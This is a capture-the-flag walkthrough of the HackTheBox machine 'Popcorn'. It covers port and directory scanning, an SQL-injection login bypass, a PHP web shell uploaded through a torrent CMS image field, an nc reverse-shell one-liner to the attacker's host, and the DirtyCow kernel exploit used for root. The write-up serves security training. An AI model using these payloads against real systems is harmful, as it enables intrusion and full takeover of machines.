First enumeration with nmap
# Nmap 7.93 scan initiated Wed May 17 12:13:10 2023 as: nmap -sC -sV -T4 -oN normal.txt -p 22,80 -Pn 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3ec81b15211550ec6e63bcc56b807b38 (DSA)
|_ 2048 aa1f7921b842f48a38bdb805ef1a074d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 17 12:13:24 2023 -- 1 IP address (1 host up) scanned in 14.03 seconds
noticed a web server running on port 80, openning it on a browser, got directed to a default web page. let’s fuzz for hidden dirs.
┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Popcorn]
└─$ dirb http://10.10.10.6/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 17 11:43:45 2023
URL_BASE: http://10.10.10.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.6/ ----
+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:286)
+ http://10.10.10.6/index (CODE:200|SIZE:177)
+ http://10.10.10.6/index.html (CODE:200|SIZE:177)
+ http://10.10.10.6/server-status (CODE:403|SIZE:291)
+ http://10.10.10.6/test (CODE:200|SIZE:47330)
==> DIRECTORY: http://10.10.10.6/torrent/
---- Entering directory: http://10.10.10.6/torrent/ ----
==> DIRECTORY: http://10.10.10.6/torrent/admin/
+ http://10.10.10.6/torrent/browse (CODE:200|SIZE:9278)
+ http://10.10.10.6/torrent/comment (CODE:200|SIZE:936)
+ http://10.10.10.6/torrent/config (CODE:200|SIZE:0)
cool we have a juicy dir torrent, let’s check it out.
navigating to the torrent dir, got directed to a torrent hoster cms. let’s try to login.
tried to bypass the login page using sqli payload admin' or 1=1-- :admin' or 1=1-- …
Bull’s eye it worked, we are in as admin. let’s check for how to exploit this service Torrent Hoster. there’s a file upload vuln let’s exploit it.
┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Popcorn]
└─$ wget https://cdimage.kali.org/kali-2023.1/kali-linux-2023.1-installer-amd64.iso.torrent
--2023-05-18 00:31:47-- https://cdimage.kali.org/kali-2023.1/kali-linux-2023.1-installer-amd64.iso.torrent
Resolving cdimage.kali.org (cdimage.kali.org)... 192.99.200.113
Connecting to cdimage.kali.org (cdimage.kali.org)|192.99.200.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://kali.download/base-images/kali-2023.1/kali-linux-2023.1-installer-amd64.iso.torrent [following]
--2023-05-18 00:31:49-- https://kali.download/base-images/kali-2023.1/kali-linux-2023.1-installer-amd64.iso.torrent
Resolving kali.download (kali.download)... 104.18.103.100, 104.18.102.100, 2606:4700::6812:6664, ...
Connecting to kali.download (kali.download)|104.18.103.100|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 296259 (289K) [application/octet-stream]
Saving to: ‘kali-linux-2023.1-installer-amd64.iso.torrent’
kali-linux-2023.1-installer-amd64.iso.tor 100%[====================================================================================>] 289.32K 284KB/s in 1.0s
2023-05-18 00:31:51 (284 KB/s) - ‘kali-linux-2023.1-installer-amd64.iso.torrent’ saved [296259/296259]
first we download a torrent file from torrent.
click on the upload button and upload the torrent file you downloaded, after that click the upload torrent button.
after uploading the torrent file, it will show there’s no image file found. click on edit this torrent.
upload an image file then intercept with burp.
delete all that image content, put a payload
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
replace those content with the php cmd webshell payload above, add .php to the image file, and send the request. now let’s check the shell in the /upload dir.
cool we got our php shell, let’s try it out if we got RCE.
great we got RCE. let’s get a reverse shell. fire up ncat listener
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 445 >/tmp/f
reverse shell payload.
send the payload and check back ncat listener.
┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Popcorn]
└─$ ncat -lnvp 445
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::445
Ncat: Listening on 0.0.0.0:445
Ncat: Connection from 10.10.10.6.
Ncat: Connection from 10.10.10.6:42739.
bash: no job control in this shell
www-data@popcorn:/var/www/torrent/upload$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@popcorn:/var/www/torrent/upload$
bingo we got a reverse shell…
Privilege Escalation
www-data@popcorn:/tmp$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/tmp$
checking the kernel version, we can see it is running an old version of ubuntu. let’s try out dirtycow exploit.
found an exploit using searchsploit. let’s send it to the target and compile it.
www-data@popcorn:/tmp$ wget http://10.10.14.14/40839.c
--2023-05-18 22:14:33-- http://10.10.14.14/40839.c
Connecting to 10.10.14.14:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4814 (4.7K) [text/x-csrc]
Saving to: `40839.c'
100%[==============================================================================================>] 4,814 --.-K/s in 0.008s
2023-05-18 22:14:33 (604 KB/s) - `40839.c' saved [4814/4814]
www-data@popcorn:/tmp$ gcc -pthread 40839.c dirty -lcrypt
gcc: dirty: No such file or directory
www-data@popcorn:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
www-data@popcorn:/tmp$ ls -al dirty
-rwxr-xr-x 1 www-data www-data 13603 May 18 22:15 dirty
www-data@popcorn:/tmp$
send the exploit to the target and compiled it. now let’s run the exploit.
www-data@popcorn:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fiOEyJZz3b5lA:0:0:pwned:/root:/bin/bash
mmap: b787c000
^C
www-data@popcorn:/tmp$ su firefart
Password:
firefart@popcorn:/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@popcorn:/tmp#
ran the exploit, it creates a backup file for /etc/passwd and modify the current one by creating a user firefart request a password we can use to login and giving it the sudo group privilege. abd Bull’s eye got root.
hand we are through… Had fun yeah? 😉